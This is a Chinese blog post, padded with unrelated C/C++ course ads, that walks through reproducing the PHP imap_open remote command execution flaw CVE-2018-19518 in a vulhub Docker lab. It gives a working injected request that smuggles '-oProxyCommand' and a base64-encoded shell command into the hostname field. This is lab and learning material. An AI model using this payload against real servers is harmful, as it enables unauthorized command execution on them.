2024年PHP--远程命令执行漏洞CVE-2018-19518复现(1),2024年最新C C++最牛教材

最新推荐文章于 2024-07-26 01:57:27 发布
最新推荐文章于 2024-07-26 01:57:27 发布
阅读量241 收藏 4
点赞数 7
分类专栏: 程序员 文章标签: c语言 c++ 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84973631/article/details/138805418
版权

img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上C C++开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

漏洞复现

首先进入环境,最好在root权限下进行

cd vulhub/php/CVE-2018-19518

然后我们进入到该目录下使用docker启动

docker-compose build
docker-compose up -d

在这里插入图片描述
然后我们访问该ip的8080端口,出现一个登陆界面,这里我们随意输入,准备采取抓包

在这里插入图片描述
使用burp进行抓包,并发送到Repeater里
在这里插入图片描述
然后我们修改数据包,添加一段执行代码
例如 echo ‘Hello’>/tmp/test,对它进行base64编码
ZWNobyAYSGVsbG8ZPi90bXAvdGVzdA==
在这里插入图片描述
这里-oProxyCommand 表示使用该参数。
%09后添加上面进行base64编码后的内容,再将部分内容进行url编码。

hostname=x+-oProxyCommand%3decho%09ZWNobyAnSGVsbG8nPi90bXAvdGVzdA%3d%3d|base64%09-d|sh}&username=111&password=222

点击send发送数据包以后,我们准备进入虚拟机查看是否创建成功
在这里插入图片描述

进入容器

这里我们进入容器查看刚才文件是否创建成功,先查询id

docker ps -a

查看容器id后在下面命令中输入id进入

docker exec -it ID /bin/bash

进入到tmp目录下查看文件

cd /tmp
ls -al
cat test



![img](https://img-blog.csdnimg.cn/img_convert/39fac37de59de674a53ab137bca2db22.png)
![img](https://img-blog.csdnimg.cn/img_convert/29db9191fe75e630d0a3d5634c792e80.png)

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上C C++开发知识点,真正体系化!**

**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[如果你需要这些资料,可以戳这里获取](https://bbs.csdn.net/topics/618668825)**

码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[如果你需要这些资料,可以戳这里获取](https://bbs.csdn.net/topics/618668825)**
2401_84973631
关注
专栏目录
漏洞复现】深信服 行为感知系统 日志中心 c.php 远程命令执行
alert['Hello World']
07-17 394
深信服 行为感知系统 日志中心 c.php存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限
PHP imap 远程命令执行漏洞复现CVE-2018-19518
0xSec
12-27 1207
IMAP是在系统中执行任何命令的桥梁。Internet消息访问协议(IMAP)是电子邮件客户端用于通过TCP / IP连接从邮件服务器检索电子邮件的Internet标准协议。IMAP由Mark Crispin于1986设计为远程邮箱协议,与广泛使用的POP(一种用于检索邮箱内容的协议)形成对比。目前,IMAP由RFC 3501定义规格。IMAP的设计目标是允许多个电子邮件客户端完全管理电子邮件收件箱。因此,客户端通常会在服务器上保留消息,直到用户明确删除它们为止。
cve-2018-19518漏洞复现
m0_74402888的博客
04-28 648
php imap扩展用户在php执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞
CVE-2018-19518 漏洞复现
Jay17的博客
02-10 1381
CVE-2018-19518 漏洞复现
PHP imap 远程命令执行漏洞CVE-2018-19518
网络安全。
03-13 2613
0x01 简介 php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 ...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2018-19518 PHP-IMAP 复现学习 (环境CTFShow web312)
paidx0
08-09 477
CVE-2018-19518复现学习 漏洞描述 IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php中调用的是imap_open函数 imap_open( string $mailbox,string $user,string $password) 其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而,debian/ubuntu中默认使用ssh来代替rs
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
fly夏天的博客
06-19 2398
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
网络安全必学渗透测试流程
qq_44005305的博客
02-12 631
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。
PHP 远程命令执行漏洞CVE-2018-19518
qq_46501419的博客
03-21 958
CVE-2018-19518详细信息影响范围复现过程 详细信息 在PHP和其他产品的imap_open()中使用的UNIX上的华盛顿大学IMAP工具包2007f启动rsh命令(借助于c-client / imap4r1.c中的imap_rimap函数和osdep / unix / tcp_unix中的tcp_aopen函数.c),而不会阻止参数注入,如果IMAP服务器名称是不受信任的输入(例如,由Web应用程序的用户输入),并且rsh已被具有不同参数的程序替换,则远程攻击者可能会执行任意OS命令语义。 例如
CVE-2018-19518- imap 远程命令执行漏洞分析
lyy0xfff的博客
08-03 2662
CVE-2018-19518 IMAP 远程命令执行漏洞分析 0x00 漏洞介绍 IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php中调用的是imap_open函数 imap_open( string $mailbox,string $user,string $password) 其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而,debian/ubu
CVE-2024-3094】——漏洞复现、原理分析以及漏洞修复
IronmanJay的博客
05-17 5590
XZ-Utils是Linux、Unix等POSIX兼容系统中广泛用于处理.xz文件的套件,包含liblzma、xz等组件,已集成在debian、ubuntu、centos等发行版仓库中。20243月29日,安全社区披露其存在CVE-2024-3094 XZ-Utils 5.6.0-5.6.1版本后门风险。该后门存在于XZ Utils的5.6.0和5.6.1版本中,由于SSH底层依赖了liblzma等,攻击者可能利用这一漏洞在受影响的系统上绕过SSH的认证获得未授权访问权限,执行任意代码。
1Panel面板最新前台RCE漏洞(CVE-2024-39911)
最新发布
棉花糖的博客
07-26 984
1Panel 是新一代的 Linux 服务器运维管理面板,用户可以通过 Web 图形界面轻松管理 Linux 服务器,实现主机监控、文件管理、数据库管理、容器管理等功能。网站监控功能影响 == 1panel/openresty:1.21.4.3-3-1-focal WAF功能影响
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值